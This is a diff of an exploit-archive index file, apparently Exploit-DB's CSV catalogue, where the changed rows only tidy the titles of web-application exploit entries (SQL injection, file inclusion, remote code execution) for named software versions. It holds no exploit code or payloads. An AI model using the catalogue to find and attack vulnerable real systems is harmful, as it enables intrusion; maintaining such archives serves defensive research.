3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 @@ -17566,7 +17571,7 @@ id,file,description,date,author,platform,type,port 3972,platforms/php/webapps/3972.txt,"Scallywag - 'template.php path' Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps,0 3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - (my_progress.php course) SQL Injection",2007-05-23,Silentz,php,webapps,0 3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - (courseLog.php scormcontopen) SQL Injection",2007-05-24,Silentz,php,webapps,0 -3981,platforms/php/webapps/3981.php,"cpCommerce 1.1.0 - (category.php id_category) SQL Injection",2007-05-24,Kacper,php,webapps,0 +3981,platforms/php/webapps/3981.php,"CPCommerce 1.1.0 - 'id_category' Parameter SQL Injection",2007-05-24,Kacper,php,webapps,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion",2007-05-24,DeltahackingTEAM,php,webapps,0 3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,php,webapps,0 @@ -18044,7 +18049,7 @@ id,file,description,date,author,platform,type,port 4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - (output) Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0 4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0 -4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2007-12-21,irk4z,php,webapps,0 +4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - Local File Inclusion / SQL Injection",2007-12-21,irk4z,php,webapps,0 4766,platforms/php/webapps/4766.txt,"mBlog 1.2 - (page) Remote File Disclosure",2007-12-21,irk4z,php,webapps,0 4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusion",2007-12-21,MhZ91,php,webapps,0 4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0 @@ -18503,18 +18508,18 @@ id,file,description,date,author,platform,type,port 5391,platforms/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,php,webapps,0 5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 Plugin Maps - Remote Command Execution",2008-04-07,EgiX,php,webapps,0 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Parameter Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 -5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 -5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0 -5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 -5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 +5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - 'viewsource.php' Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 +5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - 'viewsource.php' File Disclosure",2008-04-07,Stack,php,webapps,0 +5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - 'index.php' SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 +5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - 'ladderid' Parameter SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5402,platforms/php/webapps/5402.txt,"iScripts Socialware - 'id' SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5404,platforms/php/webapps/5404.php,"phpTournois G4 - Arbitrary File Upload / Code Execution",2008-04-08,"Charles Fol",php,webapps,0 -5405,platforms/php/webapps/5405.txt,"exbb 0.22 - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0 -5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - (editlink.php id) SQL Injection",2008-04-08,"Guido Landi",php,webapps,0 +5405,platforms/php/webapps/5405.txt,"ExBB 0.22 - Local / Remote File Inclusion",2008-04-08,The:Paradox,php,webapps,0 +5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - 'editlink.php' SQL Injection",2008-04-08,"Guido Landi",php,webapps,0 5407,platforms/php/webapps/5407.php,"FLABER 1.1 RC1 - Remote Command Execution",2008-04-08,EgiX,php,webapps,0 5408,platforms/php/webapps/5408.pl,"LokiCMS 0.3.3 - Remote Command Execution",2008-04-08,girex,php,webapps,0 5409,platforms/asp/webapps/5409.txt,"SuperNET Shop 1.0 - SQL Injection",2008-04-08,U238,asp,webapps,0 -5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - (matchid) SQL Injection",2008-04-08,0in,php,webapps,0 +5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - 'matchid' Parameter SQL Injection",2008-04-08,0in,php,webapps,0 5411,platforms/php/webapps/5411.txt,"Dream4 Koobi Pro 6.25 Links - 'categ' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0 5412,platforms/php/webapps/5412.txt,"Dream4 Koobi Pro 6.25 Shop - 'categ' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0 5413,platforms/php/webapps/5413.txt,"Dream4 Koobi Pro 6.25 Gallery - 'galid' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0 @@ -18522,33 +18527,33 @@ id,file,description,date,author,platform,type,port 5415,platforms/php/webapps/5415.txt,"Dream4 Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,php,webapps,0 -5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0 +5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - 'path' Parameter File Disclosure",2008-04-09,JIKO,php,webapps,0 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version - 'file' Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0 -5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - (category id) Blind SQL Injection",2008-04-10,irvian,php,webapps,0 -5423,platforms/php/webapps/5423.txt,"Ksemail - 'index.php language' Local File Inclusion",2008-04-10,dun,php,webapps,0 +5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - 'id' Parameter Blind SQL Injection",2008-04-10,irvian,php,webapps,0 +5423,platforms/php/webapps/5423.txt,"Ksemail - Local File Inclusion",2008-04-10,dun,php,webapps,0 5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 -5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'popup_img.php fotoID' SQL Injection",2008-04-10,S@BUN,php,webapps,0 -5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0 +5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'fotoID' Parameter SQL Injection",2008-04-10,S@BUN,php,webapps,0 +5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' Parameter SQL Injection",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 5431,platforms/php/webapps/5431.txt,"Joomla! Component JoomlaXplorer 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 5432,platforms/php/webapps/5432.txt,"PHPAddressBook 2.11 - 'view.php' SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 5433,platforms/php/webapps/5433.txt,"CcMail 1.0.1 - Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0 5434,platforms/php/webapps/5434.pl,"1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection",2008-04-13,girex,php,webapps,0 5435,platforms/php/webapps/5435.txt,"Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0 -5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - (pollID) SQL Injection",2008-04-13,S@BUN,php,webapps,0 -5437,platforms/php/webapps/5437.txt,"cpcommerce 1.1.0 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-04-13,BugReport.IR,php,webapps,0 +5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - 'pollID' Parameter SQL Injection",2008-04-13,S@BUN,php,webapps,0 +5437,platforms/php/webapps/5437.txt,"CPCommerce 1.1.0 - Cross-Site Scripting / Local File Inclusion",2008-04-13,BugReport.IR,php,webapps,0 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps,0 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Blind SQL Injection",2008-04-13,Lidloses_Auge,php,webapps,0 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,php,webapps,0 -5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - (content_id) SQL Injection",2008-04-14,Stack,php,webapps,0 +5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - 'content_id' Parameter SQL Injection",2008-04-14,Stack,php,webapps,0 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - (index.php cat) SQL Injection",2008-04-14,"SoSo H H",php,webapps,0 5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - (article) SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 5447,platforms/php/webapps/5447.txt,"Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps,0 5448,platforms/php/webapps/5448.txt,"Dream4 Koobi Pro 6.25 Poll - 'poll_id' Parameter SQL Injection",2008-04-14,S@BUN,php,webapps,0 5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'index.php cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0 -5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 +5452,platforms/php/webapps/5452.txt,"LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0 5456,platforms/asp/webapps/5456.txt,"carbon communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' SQL Injection",2008-04-16,cO2,php,webapps,0 @@ -18632,7 +18637,7 @@ id,file,description,date,author,platform,type,port 5553,platforms/asp/webapps/5553.txt,"FipsCMS - 'print.asp lg' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) SQL Injection",2008-05-07,cOndemned,php,webapps,0 5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 - (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0 -5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 +5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' Parameter SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0 5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0 5559,platforms/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0 @@ -19126,7 +19131,7 @@ id,file,description,date,author,platform,type,port 6143,platforms/php/webapps/6143.txt,"Getacoder clone - (sb_protype) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - (cate_id) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - (art) SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 -6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - (story.php id) SQL Injection",2008-07-28,"Hussin X",php,webapps,0 +6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - 'story.php' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6147,platforms/php/webapps/6147.txt,"Youtuber Clone - 'ugroups.php UID' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - 'Language' Local File Inclusion",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 @@ -19550,7 +19555,7 @@ id,file,description,date,author,platform,type,port 6737,platforms/php/webapps/6737.txt,"LokiCMS 0.3.4 - 'index.php' Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0 6739,platforms/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0 6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,php,webapps,0 -6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - writeconfig() Remote Command Execution",2008-10-13,girex,php,webapps,0 +6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution",2008-10-13,girex,php,webapps,0 6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,php,webapps,0 6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp id' SQL Injection",2008-10-13,"Hussin X",php,webapps,0 6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0 @@ -20007,7 +20012,7 @@ id,file,description,date,author,platform,type,port 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL Injection / Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 -7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 +7308,platforms/php/webapps/7308.txt,"CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0 7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 @@ -20739,7 +20744,7 @@ id,file,description,date,author,platform,type,port 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0 -8455,platforms/php/webapps/8455.txt,"cpCommerce 1.2.8 - (id_document) Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 +8455,platforms/php/webapps/8455.txt,"CPCommerce 1.2.8 - 'id_document' Parameter Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - (ficha.php) SQL Injection",2009-04-16,snakespc,php,webapps,0 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0 @@ -20934,7 +20939,7 @@ id,file,description,date,author,platform,type,port 8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0 8787,platforms/php/webapps/8787.txt,"MyFirstCMS 1.0.2 - Arbitrary File Delete",2009-05-26,darkjoker,php,webapps,0 8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script - 'profile.php user_id' SQL Injection",2009-05-26,Qabandi,php,webapps,0 -8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion",2009-05-26,StAkeR,php,webapps,0 +8790,platforms/php/webapps/8790.pl,"CPCommerce 1.2.x - 'GLOBALS[prefix]' Arbitrary File Inclusion",2009-05-26,StAkeR,php,webapps,0 8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion",2009-05-26,asL-Sabia,php,webapps,0 8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Authentication Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0 @@ -21429,7 +21434,7 @@ id,file,description,date,author,platform,type,port 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 9609,platforms/php/webapps/9609.txt,"Mambo Component 'com_hestar' - SQL Injection",2009-09-09,M3NW5,php,webapps,0 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 -9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 +9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0 9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - (Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps,0 @@ -22922,7 +22927,7 @@ id,file,description,date,author,platform,type,port 12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 -12436,platforms/php/webapps/12436.txt,"Pligg CMS 1.0.4 - (story.php?id) SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0 +12436,platforms/php/webapps/12436.txt,"Pligg CMS 1.0.4 - 'story.php' SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0 12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12440,platforms/php/webapps/12440.txt,"Joomla! Component 'Wap4Joomla' - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0 @@ -23002,7 +23007,7 @@ id,file,description,date,author,platform,type,port 12556,platforms/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 12558,platforms/php/webapps/12558.txt,"29o3 CMS - (LibDir) Multiple Remote File Inclusion",2010-05-10,eidelweiss,php,webapps,0 -12560,platforms/php/webapps/12560.txt,"724CMS 4.59 Enterprise - SQL Injection",2010-05-10,cyberlog,php,webapps,0 +12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection",2010-05-10,cyberlog,php,webapps,0 12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections",2010-05-10,R3d-D3V!L,php,webapps,0 12562,platforms/php/webapps/12562.txt,"Waibrasil - Remote File Inclusion / Local File Inclusion",2010-05-10,eXeSoul,php,webapps,0 12563,platforms/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice - Multiple Vulnerabilities",2010-05-10,MasterGipy,php,webapps,0 @@ -24220,7 +24225,7 @@ id,file,description,date,author,platform,type,port 15856,platforms/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 -15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 +15863,platforms/php/webapps/15863.txt,"LightNEasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15864,platforms/php/webapps/15864.txt,"Ignition 1.3 - (page.php) Local File Inclusion",2010-12-30,cOndemned,php,webapps,0 15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution",2010-12-30,cOndemned,php,webapps,0 15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution",2011-01-05,mr_me,php,webapps,0 @@ -25710,7 +25715,7 @@ id,file,description,date,author,platform,type,port 21552,platforms/php/webapps/21552.txt,"PHP Classifieds 6.0.5 - Cross-Site Scripting",2002-06-14,windows-1256,php,webapps,0 21553,platforms/cgi/webapps/21553.txt,"Mewsoft NetAuction 3.0 - Cross-Site Scripting",2002-06-14,windows-1256,cgi,webapps,0 21557,platforms/php/webapps/21557.txt,"ZeroBoard 4.1 - PHP Include File Arbitrary Command Execution",2002-06-15,onlooker,php,webapps,0 -21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.cgi Arbitrary File Disclosure",2002-06-15,cult,cgi,webapps,0 +21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - 'MagicCard.cgi' Arbitrary File Disclosure",2002-06-15,cult,cgi,webapps,0 21562,platforms/java/webapps/21562.txt,"Wolfram Research webMathematica 4.0 - File Disclosure",2002-06-17,"Andrew Badr",java,webapps,0 21563,platforms/php/webapps/21563.txt,"osCommerce 2.1 - Remote File Inclusion",2002-06-16,"Tim Vandermeerch",php,webapps,0 21564,platforms/php/webapps/21564.txt,"PHP-Address 0.2 e - Remote File Inclusion",2002-06-17,"Tim Vandermeerch",php,webapps,0 @@ -26352,7 +26357,7 @@ id,file,description,date,author,platform,type,port 23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Persistent Cross-Site Scripting",2012-12-16,limb0,php,webapps,0 23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server - user.php Script Unauthorized Access",2003-12-10,frog,php,webapps,0 23429,platforms/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server - SQL Injection",2003-12-10,"Chintan Trivedi",php,webapps,0 -23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - PollBooth.php Multiple SQL Injection",2003-12-10,frog,php,webapps,0 +23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection",2003-12-10,frog,php,webapps,0 23432,platforms/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection",2003-12-11,"Oliver Karow",cgi,webapps,0 23434,platforms/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,php,webapps,0 23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0 @@ -29144,7 +29149,7 @@ id,file,description,date,author,platform,type,port 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0 27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0 27731,platforms/php/webapps/27731.txt,"PhotoKorn 1.53/1.54 - 'index.php' Multiple Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 -27732,platforms/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - postcard.php id Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 +27732,platforms/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - 'id' Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27733,platforms/php/webapps/27733.txt,"PhotoKorn 1.53/1.54 - print.php cat Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27734,platforms/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps,0 27735,platforms/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,php,webapps,0 @@ -30836,7 +30841,7 @@ id,file,description,date,author,platform,type,port 30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 -30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - Manufacturer.php SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 +30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - 'manufacturer.php' SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 30102,platforms/php/webapps/30102.php,"Pheap 2.0 - config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 - Archives.php SQL Injection",2007-03-16,Serapis.net,php,webapps,0 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Persistent Cross-Site Scripting in Multiple Parameters",2013-12-11,sajith,php,webapps,0 @@ -31307,10 +31312,10 @@ id,file,description,date,author,platform,type,port 30961,platforms/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 - 'function.php' Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0 30962,platforms/php/webapps/30962.txt,"MilliScripts - 'dir.php' Cross-Site Scripting",2007-12-31,"Jose Luis Gangora Fernandez",php,webapps,0 30963,platforms/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",asp,webapps,0 -30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 - user/remindPassword return Parameter Cross-Site 